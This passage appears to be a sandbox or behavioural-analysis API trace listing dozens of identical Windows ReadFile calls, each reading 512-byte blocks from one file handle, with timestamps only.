hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.500] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.500] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: 